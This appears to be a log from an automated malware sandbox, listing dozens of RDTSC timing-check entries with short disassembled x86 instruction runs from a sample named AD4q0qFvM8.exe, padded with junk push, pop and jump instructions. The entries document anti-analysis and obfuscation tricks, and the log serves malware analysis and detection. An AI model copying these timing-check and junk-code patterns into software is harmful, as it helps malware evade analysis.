Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F3D72F second address: F3D74C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F425DF second address: F425E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F425E8 second address: F425EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F425EE second address: F425F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41ACF second address: F41AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AD3 second address: F41AE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AE4 second address: F41AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jng 00007FDAC110B2A0h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AF4 second address: F41AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41AFA second address: F41B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F41D6F second address: F41D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F482AB second address: F482C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDAC110B286h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d jc 00007FDAC110B292h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F482C0 second address: F482C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F494D7 second address: F494E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F494E9 second address: F494FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FDAC0B0C7FCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F497AA second address: F497C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDAC110B291h 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F4F7F9 second address: F4F829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDAC0B0C7F6h 0x0000000a jmp 00007FDAC0B0C7FCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDAC0B0C807h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F52BD3 second address: F52BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F52BD7 second address: F52BDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F535FC second address: F53629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FDAC110B294h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBA8 second address: F5BBAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBAF second address: F5BBB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBB5 second address: F5BBD2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FDAC0B0C7FDh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBD2 second address: F5BBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBD8 second address: F5BBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBE1 second address: F5BBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5BBE7 second address: F5BBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A231 second address: F5A239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A239 second address: F5A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FDAC0B0C7F6h 0x0000000f jmp 00007FDAC0B0C800h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A258 second address: F5A25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A25C second address: F5A268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDAC0B0C7F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3A4 second address: F5A3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDAC110B294h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3C1 second address: F5A3ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDAC0B0C808h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3ED second address: F5A3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A3F1 second address: F5A426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 jmp 00007FDAC0B0C7FCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FDAC0B0C7F6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A426 second address: F5A42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A42A second address: F5A443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDAC0B0C7FDh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A58A second address: F5A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A6EE second address: F5A6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F5A6F6 second address: F5A715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FDAC110B296h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F599DC second address: F599E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F599E2 second address: F599E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F6426A second address: F6426E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F644DD second address: F644F2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDAC110B286h 0x00000008 jc 00007FDAC110B286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F760E1 second address: F760E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F760E5 second address: F760E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75A8B second address: F75AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C805h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C18 second address: F75C35 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDAC110B286h 0x00000008 jmp 00007FDAC110B28Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FDAC110B286h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C35 second address: F75C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C3B second address: F75C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C41 second address: F75C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F75C47 second address: F75C61 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAC110B286h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FDAC110B286h 0x00000014 jbe 00007FDAC110B286h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F7CC85 second address: F7CC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDAC0B0C7FFh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9D78D second address: E9D791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9D791 second address: E9D79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDAC0B0C7F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: E9D79D second address: E9D7A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDAC110B28Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F82B45 second address: F82B9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007FDAC0B0C7F6h 0x00000009 jmp 00007FDAC0B0C807h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 jo 00007FDAC0B0C7F6h 0x00000019 jmp 00007FDAC0B0C802h 0x0000001e pop ebx 0x0000001f jmp 00007FDAC0B0C800h 0x00000024 je 00007FDAC0B0C7FCh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F82B9B second address: F82BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902A6 second address: F902AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902AB second address: F902D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDAC110B292h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDAC110B290h 0x0000000f jbe 00007FDAC110B286h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902D7 second address: F902DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F902DD second address: F90304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FDAC110B297h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90460 second address: F90464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90464 second address: F90489 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDAC110B286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FDAC110B292h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90489 second address: F9048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9048D second address: F90493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90493 second address: F9049B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9049B second address: F9049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9049F second address: F904C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FDAC0B0C808h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F908BC second address: F908CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDAC110B286h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F908CD second address: F908D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F908D7 second address: F908DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90A7C second address: F90A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDAC0B0C7F6h 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90BD3 second address: F90C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FDAC110B296h 0x00000010 jmp 00007FDAC110B298h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90C19 second address: F90C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90DA4 second address: F90DE1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDAC110B28Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FDAC110B286h 0x00000010 pushad 0x00000011 ja 00007FDAC110B286h 0x00000017 pushad 0x00000018 popad 0x00000019 jnc 00007FDAC110B286h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FDAC110B293h 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90DE1 second address: F90DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F90DE5 second address: F90E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDAC110B286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDAC110B292h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9475D second address: F94766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F94766 second address: F9477C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: F9477C second address: F94780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B0F8A second address: 70B103D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e call 00007FDAC0B0C7FEh 0x00000013 movzx eax, bx 0x00000016 pop edx 0x00000017 pushfd 0x00000018 jmp 00007FDAC0B0C7FCh 0x0000001d sbb esi, 2BFFD468h 0x00000023 jmp 00007FDAC0B0C7FBh 0x00000028 popfd 0x00000029 popad 0x0000002a pop edi 0x0000002b jmp 00007FDAC0B0C806h 0x00000030 test eax, eax 0x00000032 jmp 00007FDAC0B0C800h 0x00000037 jne 00007FDB2E85AED8h 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FDAC0B0C7FEh 0x00000044 xor eax, 23542928h 0x0000004a jmp 00007FDAC0B0C7FBh 0x0000004f popfd 0x00000050 mov cx, 8E1Fh 0x00000054 popad 0x00000055 mov edx, dword ptr [ebp+08h] 0x00000058 pushad 0x00000059 mov ah, 22h 0x0000005b mov esi, ebx 0x0000005d popad 0x0000005e mov eax, dword ptr [esi] 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 mov si, BF07h 0x00000067 mov di, si 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B103D second address: 70B109A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c movzx esi, dx 0x0000000f mov si, dx 0x00000012 popad 0x00000013 mov eax, dword ptr [esi+04h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDAC110B28Ah 0x0000001d sbb al, 00000018h 0x00000020 jmp 00007FDAC110B28Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [edx+04h], eax 0x0000002a jmp 00007FDAC110B296h 0x0000002f mov eax, dword ptr [esi+08h] 0x00000032 pushad 0x00000033 mov cl, A2h 0x00000035 mov esi, edx 0x00000037 popad 0x00000038 mov dword ptr [edx+08h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B109A second address: 70B109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B109E second address: 70B10A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B10A4 second address: 70B111C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c pushad 0x0000000d push esi 0x0000000e pushfd 0x0000000f jmp 00007FDAC0B0C803h 0x00000014 xor si, E54Eh 0x00000019 jmp 00007FDAC0B0C809h 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov ebx, 2623E844h 0x00000025 popad 0x00000026 mov dword ptr [edx+0Ch], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FDAC0B0C805h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B111C second address: 70B1122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1122 second address: 70B1139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C803h 0x00000009 rdtsc
